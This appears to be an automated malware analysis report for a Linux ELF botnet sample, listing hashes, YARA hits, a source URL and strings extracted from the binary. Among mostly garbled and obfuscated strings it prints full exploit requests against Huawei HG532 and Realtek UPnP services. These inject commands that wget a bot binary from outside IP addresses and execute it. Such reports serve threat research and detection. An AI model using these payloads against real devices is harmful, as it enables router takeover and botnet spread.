Sample details: 47298bb4284110b7e0ea7d192b37ee82

Hashes
MD5: 47298bb4284110b7e0ea7d192b37ee82
SHA1: fc1fdabcc1712fa09c85d8d47d94d4c4ac8963ad
SHA256: 347c22d6ec00e5f655dec69ec323445866506085fb8325e08402ba90a578b470
SSDEEP: 1536:b/2DtydazaekQwt1Ps0fizorhXyLrRNJmBHUkHnCZ5wcr:buDMggQNYi0rkJmB04ny
Details
File Type: ELF
YARA Hits
YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/Big_Numbers1
Source
http://192.119.111.12/bins/blxntz.sh4
Strings
		3=R'04
2)%#a)')A
AMB[!+'{!
B#a=A(1
;"s4"!
;"s0"!
;"G7"!
/sm"O,
qsj !<
Lds`La
Lds`La
AmH|g;"'
2)'#a)#)A
AmB{!+#;!
AmH<c{!!
";c=@ 
/Sn"O}
P)'#a)#
AmB{!+#;!
}b`fBr-a
 (w$Q.u
P)'#a)#
AmB{!+#;!
=b4r-a
-b,j|a
d$Q u@
P)'#a)#
AmB{!+#;!
&	tpgc`
"ca!# 
P)'#a)#
AmB{!+#;!
#nla,b
`"1!Cc
)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
R#ay!p1
)'#a)#)A
AmB{!+#;!
Q{#+#y
2*Uk!g
7zPz](p
)'#a)#
AmB{!+#;!
2-a#`)@
/s`miCWDX
	t@bsa9'
`)A|1)@,b9(
P2c003
3a9'CV9"
C)#8#a
"Bc#`ra
Gz#:"* 
f*!2-z#
Az"j!#c
ech3fsb
"ca:!#c
Cb+z":&#aj"R*
P2c003
3a9'CV9"
Cc,3Sf
C)#8#a
g3amA|1Qf
ql22,!!!%
;"Sak"I
B<cmA{"C
Cc,3Sf
a(1f1Y
VBa,6f
Sb)BSa
h.d^cba|1
b:" !ba|1
" !ba|1
" !ba|1
Sb)BSa
h.d^cba|1
b:" !ba|1
" !ba|1
" !ba|1
r,aV11
CcKc8#
(w2"$qq
(w2"$qq
(w2"$qq
3e3a u
a,q3b2
sc&0(C
c`K [ h&
qQSRVSWTXUYVZW[
qVcVf(@Vg= Vhm#Vi}&Vj
#`K`cm
vra2"qS
bCa-GSP
r'WCa	
s"f8#r!
j"UCc!X
j#WCc"U
rCc$V#W
j%XCc$V
Cb\fca
x'R$x'
sarb(1
,93fsesh
nRR8##f
eQQ(1!A!A
A8#,13
#cL33d
BcAR2a3f&g
2("!ba
=R;Q 1	
da)mf0a
(-b2Qq
Q-b"(]e
sc-Cy!sb
"{#;""*
/Ck"O;
 HTTP/1.1
User-Agent: 
Host: 
Cookie: 
Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 137.74.218.154 -l /tmp/binary -r /bins/blxntz.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
192.119.111.12
POST /picdesc.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://165.22.227.164/bins/blxntz.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /wanipcn.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://165.22.227.164/bins/blxntz.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
5: '8%
5%!5&=;
'!$$;& 
$5''#;&0
509=:efg`
& agad
<;`!?!b5 
?;: fdd`
<!: acam
509=:efg
g1$a#f!
,7gaee
,7gael
,7gaea
"' 5&759fdea
fdeadbdf
. 1m,ea
"1& 1,fa1? ?'efg
0125!8 
'<188T
1:5681T
'-' 19T
{6=:{6!'-6;,t
nt5$$81 t:; t2;!:0T
:7;&&17 T
{6=:{6!'-6;,t$'T
{6=:{6!'-6;,t?=88tymtT
{$&;7{T
{95$'T
{$&;7{:1 { 7$T
{' 5 !'T
z5:=91T
{$&;7{:1 {&;! 1T
5''#;&0T
aMLLGAVKML
CNKTG"
cAAGRV
CRRNKACVKML
ZJVON	ZON
CRRNKACVKML
cAAGRV
nCLEWCEG
aMLVGLV
CRRNKACVKML
WPNGLAMFGF"
QGVaMMIKG
PGDPGQJ
NMACVKML
AMMIKG
AMLVGLV
NGLEVJ
VPCLQDGP
GLAMFKLE
AJWLIGF"
AMLLGAVKML
QGPTGP
FMQCPPGQV"
{1 7{&1';8"z7;:2T
:591'1&"1&tT
{01"{#5 7<0;3T
{01"{9='7{#5 7<0;3T
$662*7!E
1: 1&T
e365`70;9ag:<$ef1=d?2>T
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
oCAKLVMQJ
cRRNGuG@iKV
tGPQKML
qCDCPK
oMXKNNC
AMORCVK@NG
uKLFMUQ
vPKFGLV
oMXKNNC
AMORCVK@NG
uKLFMUQ
vPKFGLV
kLDMrCVJ
oMXKNNC
AMORCVK@NG
uKLFMUQ
vPKFGLV
oqkgaPCUNGP
aGLVGP
oMXKNNC
AMORCVK@NG
uKLFMUQ
vPKFGLV
kLDMrCVJ
oMXKNNC
AMORCVK@NG
uKLFMUQ
vPKFGLV
dWLuG@rPMFWAVQ
oMXKNNC
oCAKLVMQJ
dKPGDMZ
oMXKNNC
oCAKLVMQJ
dKPGDMZ
oMXKNNC
oCAKLVMQJ
dKPGDMZ
oMXKNNC
oCAKLVMQJ
dKPGDMZ
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
;::17 10t
;!&71t
:3=:1t
/dev/null
.shstrtab
.rodata
.ctors
.dtors